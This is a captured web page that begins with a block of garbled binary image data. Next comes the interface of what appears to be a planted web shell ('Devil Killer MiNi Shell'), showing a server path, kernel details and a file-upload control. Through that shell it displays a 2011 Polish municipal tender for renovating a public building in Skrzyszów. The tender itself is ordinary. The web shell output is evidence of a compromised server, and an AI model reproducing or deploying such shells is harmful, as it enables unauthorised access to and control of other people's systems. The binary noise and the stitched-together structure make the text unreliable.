JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111110/374494-N-2011.html

<p class="kh_header"><b>Godów: Przebudowa budynku użyteczności publicznej w Skrzyszowie</b><br>
<b>Numer ogłoszenia: 374494 - 2011; data zamieszczenia: 10.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Godów , ul. 1 Maja 53, 44-340 Godów, woj. śląskie, tel. 32 47 65 065, 47 65 063, faks 32 4765100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.godow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku użyteczności publicznej w Skrzyszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje termomodernizację (ocieplenie ścian zewnętrznych i dachu budynku) wraz z wymianą stolarki okiennej i drzwiowej, przebudowę i modernizację instalacji wod-kan, co, elektrycznych, teletechnicznych, przebudowę i modernizację kotłowni, zabudowę instalacji solarnej wspomagającej przygotowanie c.w.u, roboty związane z dostosowaniem budynku do aktualnych przepisów p. poż wraz z modernizacją i wyposażeniem kuchni, klimatyzację w sali bankietowej, malowanie wszystkich pomieszczeń w budynku za wyjątkiem pomieszczeń zajmowanych przez Bank.
W celu dostosowania budynku do aktualnych wymagań z zakresu ochrony przeciwpożarowej należy wykonać następujący zakres prac:
Pomieszczenie kotłowni i składu opału :
Pomieszczenie składu opału należy wydzielić od pomieszczenia kotłowni drzwiami stalowymi, przeciwpożarowymi EI 60, typowymi, otwierane na zewnątrz z samozamykaczem. Należy wymienić drzwi prowadzące z kotłowni do pomieszczeń gospodarczych. Montowane drzwi muszą być stalowe, przeciwpożarowe EI 30, typowe, otwierane na zewnątrz z samozamykaczem. Przejścia instalacji przez ściany i stropy w pomieszczeniu składu opału muszą posiadać klasę odporności ogniowej EI 120. Przejścia instalacji przez ściany i stropy w pomieszczeniu kotłowni muszą posiadać klasę odporności ogniowej EI 60. Przejścia instalacyjne przez ściany i stropy kotłowni i składu opału powinny być zabezpieczone kołnierzami zaciskowymi o klasie odporności EI tych przejść. 
Przejścia instalacji przez stropy i ściany :
Wszystkie przejścia instalacji przez ściany i stropy oddzielenia przeciwpożarowego muszą być zabezpieczone do klasy odporności ogniowej EI 120. Przejścia przewodów o średnicy ponad 4 cm przez pozostałe ściany i stropy pomieszczeń zamkniętych zabezpieczyć do klasy odporności ogniowej EI 60. Przejścia instalacyjne powinny być zabezpieczone kołnierzami zaciskowymi o klasie odporności EI tych przejść. 
Wymiana drzwi :
Drzwi wejściowe prowadzące na zewnątrz budynku z ewakuacyjnych klatek schodowych z kondygnacji parterowej wymienić na drzwi o szerokości skrzydła nie blokowanego otwierane w kierunku zgodnym z kierunkiem ewakuacji. Drzwi zewnętrzne klatki schodowej oddymianej należy wyposażyć w elektozamek. Drzwi prowadzące z klatki schodowej do kondygnacji piwnicznej oraz do pozostałych pomieszczeń należy wymienić na drzwi o odporności ogniowej EI 30. Drzwi prowadzące z sali taneczno -widowiskowej oraz z komunikacji na klatki schodowe należy wymienić na drzwi o kierunku otwarcia zgodnym z kierunkiem ewakuacji. Wszystkie drzwi przewidziane do wymiany zostały zaznaczone na rysunkach. 
Zabezpieczenie elementów drewnianych konstrukcji dachu
Całą więźbę dachową należy zaimpregnować środkami impregnacyjno - grzybobójczymi i ogniochronnymi w celu doprowadzenia konstrukcji do NRO (niepalnej, nie kapiącej nie odpadającej pod wpływem ognia). 
Likwidacja elementów palnych :
Okładziny sufitów i ścian z materiałów drewnianych i drewnopodobnych należy usunąć. Wykonać sufit podwieszany na sali taneczno-widowiskowej z profili stalowych obłożonych płytami niepalnymi lub niezapalnymi, niekapiącymi i nieodpadającymi pod wpływem ognia. Sufit podwieszany należy wykonać jako atestowany systemowy sufit przeciwpożarowy. Sufit należy zamocować do wiązarów dachowych. Wykończenie sufitu podwieszanego wykonać z płyt gipsowo- kartonowych 2x12,5mm mocowanych do profili stalowych stosując się do nw zaleceń: Dodatkowo do sufitu należy zamontować kolorowe panele akustyczne.
- konstrukcje sufitu podwieszonego należy wykonać zgodnie z klasyfikacją ogniową lub aprobatą techniczną oraz instrukcją dostawcy systemu,
- wszystkie styki obwodowe, pomiędzy poszyciem z płyt gipsowo-kartonowych sufitów podwieszonych a powierzchnią istniejących ścian, muszą być uszczelnione przy pomocy systemowej gipsowej masy szpachlowej,
- w konstrukcji sufitów podwieszonych ruszt z profili CD 60 należy tak mocować, aby uwzględnić rozszerzalność cieplną profili przy nagrzewaniu,
- pomiędzy końcem profilu CD 60 (zamocowanym w profilu UD lub na nim opartym) a ścianą powinna pozostać szczelina o szerokości od 0,5 - 1 cm. Brak szczeliny spowoduje przedwczesne zniszczenie konstrukcji sufitów w trakcie pożaru,
- złącza płyt w każdej warstwie powinny być szpachlowane systemową masą gipsową zaś na złączach ostatniej warstwy stosuje się dodatkowo taśmę zbrojącą,
- przejścia instalacyjne mogą być wykonywane tylko zgodnie z aprobatą techniczną. Każde miejsce przejścia instalacji musi posiadać nie mniejszą odporność ogniową niż sufit, przez który dana instalacja jest prowadzona,
- dopuszcza się przeprowadzenie przez konstrukcję sufitu podwieszonego o określonej odporności ogniowej pojedynczych przewodów elektrycznych. Otwór z przewodem należy dokładnie uszczelnić systemową gipsową masą szpachlową (średnica otworu nie może być większa niż 10 mm),
- przy wykonywaniu poszycia sufitów podwieszonych posiadających określoną odporność ogniową należy płyty g-k mocować poprzecznie w stosunku do (nośnej) warstwy profili CD 60 (profile nośne są prostopadłe do osi płyt),
- należy stosować tylko takie klapy rewizyjne, których odporność ogniowa nie jest mniejsza od odporności ogniowej sufitu,
- przy układaniu wełny mineralnej w sufitach podwieszonych z określoną odpornością ogniową nie można stosować ścinek i małych kawałków wełny mineralnej,
- do podwieszania konstrukcji sufitów o określonej odporności ogniowej powinno się używać wieszaków noniuszowych,
- w sufity nie mogą być wbudowane elementy niewymienione w klasyfikacji ogniowej a także nie mogą być one obciążone innymi elementami budowlanymi, dekoracyjnymi lub instalacyjnymi itp. 
Miejsca po zlikwidowanych okładzinach ściennych należy wyrównać gładzią gipsową oraz pomalować farbami emulsyjnymi zmywalnymi lub wykończyć przy użyciu tapet.
Parkiet sali bankietowej należy poddać cyklinowaniu oraz zabezpieczyć poprzez lakierowanie. Scenę wykonaną w konstrukcji drewnianej należy zdemontować. W miejscu po zdemontowanej scenie wykonać podwyższenie murowane z bloczków gazobetonowych o wys. 24cm. Dojście do sceny stanowią 2 stopnie murowane. Ściany w sali bankietowej należy wykończyć kolorowymi płytami akustycznymi z MDF.
Przebudowa klatek schodowych :
Schody ewakuacyjne (pom. 1.17 i 1.01) zostały przewidziane do skucia oraz do ponownego wykonania. Schody należy wykonać jako monolityczne żelbetowe dwubiegowe. Płytę biegową, płytę spocznikową oraz belkę spocznikową wykonać z betonu klasy B25, zbrojone stalą zbrojeniową klasy A-II 18G2a O 8 i prętami rozdzielczymi O 6 klasy A-I St3SX jak na rysunkach konstrukcyjnych. Zbrojenie płyty biegowej należy powiązać z istniejącym spocznikiem na poziomie pierwszego piętra. Na schodach należy zamontować nowe balustrady systemowe, segmentowe, aluminiowe bądź nierdzewne, zamontowane do podłoża w sposób gwarantujący stabilność elementów. Okładzinę schodów wykonać z płytek ceramicznych antypoślizgowych. Schody wykonać zgodnie z rysunkami konstrukcyjnymi. Ściany oraz sufity należy pomalować farbami emulsyjnymi zmywalnymi. Okna w klatce schodowej głównej oraz w pomieszczeniu kotłowni należy wymienić na pustaki szklane posiadające odporność ogniową EI 30 wg rysunków. Okna w lokalu usługowym należy wymienić na okna o klasie odporności ogniowej EI 30 wg rysunku. W klatce schodowej głównej należy zamontować klapę dymową. Montaż urządzeń oddymiających zostanie wykonany przez osobę uprawnioną. Powierzchnia czynna klapy oddymiania będzie wynosić co najmniej 6% powierzchni rzutu poziomego podłogi klatki min. 0,9 m2. Zastosować klapę o wymiarach 1,00 x 1,60 np. firmy AWAK lub równoważnej. Otwór pod klapę dymową wzmocnić belkami żelbetowymi 20*20cm opartymi na ścianach nośnych zbrojonymi 4* O 12 O, strzemiona O 6 klasy A-I St3SX co 10cm. W przestrzeni pomiędzy stropem a dachem wykonać obudowę na poziomie pomiędzy stropem a dachem przy użyciu profili stalowych wykończonych płytami niepalnymi lub niezapalnymi, niekapiącymi i nieodpadającymi pod wpływem ognia np. z płyt gipsowo- kartonowych.
Przebudowa związana z dostosowaniem kuchni do aktualnie obowiązujących przepisów sanitarnych :
Zakres przebudowy obejmuje adaptację na potrzeby zaplecza kuchennego pomieszczeń 1.02,1.03 parteru obecnie użytkowanych przez straż pożarną, oraz przebudowę pomieszczeń. 2.02, 2.03, 2.04, 2.05. Wydzielone pomieszczenia pomocnicze w kuchni wyodrębnione są ściankami działowymi gr 10cm wykonanymi z pustaków gazobetonowych. 
Przebudowa pomieszczeń Straży Pożarnej :
Z uwagi na adaptację kilku pomieszczeń parteru na potrzeby rozbudowy zaplecza kuchennego wymagana jest przebudowa pomieszczeń użytkowanych przez Straż Pożarną. Główne wejście do pomieszczeń Straży pożarnej projektuje się poprzez wydzielenie z pomieszczenia 1.04 wiatrołapu, który stanowi bezpośrednią komunikacje z szatnia oraz salką zlokalizowaną w pomieszczeniu nr 1.06, gdzie uprzednio znajdował się garaż. Adaptacja garażu pociąga za sobą konieczność likwidacji bramy wjazdowej, w miejsce której projektuje się mniejsze okno doświetlające. Wszelkie zamurowanie, przemurowania wykonać z pustaków gazobetonowych o odpowiedniej grubości. Nad nowymi otworami okiennymi i drzwiowymi należy zastosować nadproża prefabrykowane typu L. Z uwagi na różnicę poziomów pomiędzy adaptowanym garażem a wydzielona komunikacją i szatnią projektuje się lekkie schody stalowe wyłożone blachą perforowaną, zabezpieczoną ogniowo do EI 30. Konstrukcję zabezpieczyć przeciw pożarowo farbami ogniochronnymi tworzącymi powłokę zapewniającą zabezpieczenie ogniowe do EI 30.
Pomieszczenie garażu 1.07. należy pogłębić celem uzyskania jednego poziomu posadzki w strefie przy bramowej, skute boki uzupełnić posadzką gr 10cm wykonaną z betonu B20 zbrojonego siatką O 10 A-II 18G2a co 10cm na podbudowie z kruszywa gr 20cm. Przed ułożeniem posadzki wykonać przeciwwilgociową systemową izolację płynną. Pomieszczenie 1.08 wymaga generalnego remontu w zakresie : zasypania i uzupełnienia posadzki w miejscu kanału, poprzez wykonanie płyty betonowej gr 10cm B20 zbrojonego siatką O 10 A-II 18G2a co 10cm na podbudowie z kruszywa gr 20cm, zamurowanie jednego otworu okiennego, wymiany dwóch pozostałych okien, wykonania tynków, posadzki. Zamontowaniu haków stalowych na całej długości umożliwiających zawieszenie wężów pożarniczych
Zakres prac obejmuje również przebudowę pomieszczeń sanitarnych polegającą na wydzieleniu damskiego i męskiego węzła sanitarnego poprzez adaptację pomieszczenia 1.10.
W pomieszczeniach należy wykonać wentylację poprzez montaż mechanicznych nawietrzaków ściennych oraz otworów wentylacyjnych w drzwiach zapewniających właściwą wymianę powietrza.
Powierzchnie podłóg wykończone płytkami ceramicznymi antypoślizgowymi. Ściany wykończone płytkami ceramicznymi do wys. 2,0m. Pomieszczenie 1.10 - wyposażyć wpust kanalizacyjny podłogowy z syfonem oraz armaturę czerpalną ze złączką do węża. 
Przebudowa pomieszczeń WOK :
Komunikacja do sali bankietowej zapewniona będzie poprzez przebudowaną klatkę schodową 1.17. Schody wykorzystywane obecnie w pom. 1.12 z uwagi na niezgodność z przepisami przewidziane są do wyburzenia. W miejscu klatki schodowej projektuje się strop żelbetowy gr. 12 cm wykonany z betonu B25 zbrojony prętami O 10 A-II /18G2a co 10cm zgodnie z rysunkiem konstrukcyjnym. 
Na piętrze projektuje się wydzielenie z pomieszczenia 2.11 sanitariatów damskich i męskich dostępnych z korytarza. W pomieszczeniach należy wykonać wentylację poprzez montaż mechanicznych nawietrzaków ściennych oraz wykonanie otworów wentylacyjnych w drzwiach zapewniających właściwą wymianę powietrza.
Powierzchnie podłóg wykończone płytkami ceramicznymi antypoślizgowymi. Ściany wykończone płytkami ceramicznymi do wys. 2,0m. Pomieszczenie 2.10.1 - wyposażyć wpust kanalizacyjny podłogowy z syfonem oraz armaturę czerpalną ze złączką do węża. 
Pomieszczenie 2.11 zostanie powiększone poprzez połączenie z pomieszczeniem 2.09. W miejscu rozebranej ściany nośnej projektuje się podciąg żelbetowy o wym. 25*60cm wykonany z betonu B25 zbrojony prętami O 20 A-III 34GS zgodnie z rys. konstrukcyjnym.
Biuro zostanie wydzielone poprzez adaptację wieży na poziomie II kondygnacji. Projektuje się wykonanie stropu żelbetowego zgodnie z rys. konstrukcyjnym. Dojście do pomieszczenia zapewnione będzie poprzez przebicie otworu drzwiowego z korytarza (ściana dylatacyjna) po uprzednim osadzeniu nadproży 4*L19
Sufit nad pomieszczeniem biura przewiduje się wykonać jako płyta żelbetowa z wyłazem dachowym zapewniającym dostęp na wieżę oraz nieużytkową kondygnację. Na stropie projektuje się wełnę mineralną gr 25cm ułożoną na foli paroprzepuszczalnej. Okna na nieużytkowych kondygnacjach wierzy zamurować z wyjątkiem jednego na elewacji południowo-wschodniej.
Pozostałe roboty budowlane i instalacyjne są szczegółowo opisane w dokumentacji projektowej.

Powierzchnia zabudowy budynku wynosi 622,28 m2, powierzchnia użytkowa wynosi  1.114,34 m2, kubatura 5.551,31 m3. Elementy wykończenia budynku są standardowe. Budynek wyposażony jest w instalacje wod.-kan., gazową, elektryczną, centralnego ogrzewania, odgromową. 

W budynku znajdują się lokale, w których prowadzona jest działalność gospodarcza w związku z tym w terminie od 1 do 15 lipca 2012 r. pomieszczenia w których prowadzona jest działalność gospodarcza zostaną całkowicie wyłączone z użytkowania. 

Szczegółowy opis przedmiotu zamówienia zawiera projekt budowlany, przedmiary robót oraz specyfikacja techniczna.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.21.20.00-6, 45.42.11.30-4, 45.45.00.00-6, 45.33.22.00-5, 45.32.00.00-6, 45.31.00.00-3, 45.33.11.00-7, 45.33.12.20-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 20.000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez złożenie :
- oświadczenia, że Wykonawca spełnia warunki zawarte w art. 22 ust.1 ustawy Prawo  zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali minimum po 1 zamówieniu polegającym na wykonywaniu robót budowlanych dotyczących przebudowy lub budowy budynków w zakresie :              - termomodernizacji (docieplenia budynku, docieplenia stropów, wymiany okien) o wartości min. 300.000 zł.,
- robót ogólnobudowlanych o wartości min. 300.000 PLN brutto, 
- przebudowy instalacji c.o. o wartości min. 150.000 PLN brutto, 
- przebudowy instalacji elektrycznej i teletechnicznej o wartości min. 170.000 PLN brutto,
- przebudowy instalacji wod. kan. o wartości min. 60.000 PLN brutto,
- przebudowy kotłowni o wartości min. 55.000 PLN brutto, 
- wykonania instalacji klimatyzacji  o wartości min. 50.000 PLN brutto.
Warunek zostanie spełniony poprzez złożenie :
- wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie co najmniej 1 osobą z uprawnieniami budowlanymi do kierowania robotami budowlanymi z ograniczeniami w specjalności konstrukcyjno - budowlanej.
Warunek zostanie spełniony poprzez złożenie :
- wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami,
- oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony druk oferta, stanowiący załącznik nr 2 do specyfikacji istotnych warunków zamówienia.
2. Kosztorys ofertowy - sporządzony indywidualnie na podstawie projektu budowlanego, specyfikacji technicznej, przedmiaru robót oraz wszystkich okoliczności mogących mieć wpływ na cenę oferty.
3. Oświadczenie, że zamówienie zostanie wykonane w terminie do 30 września 2012 r.
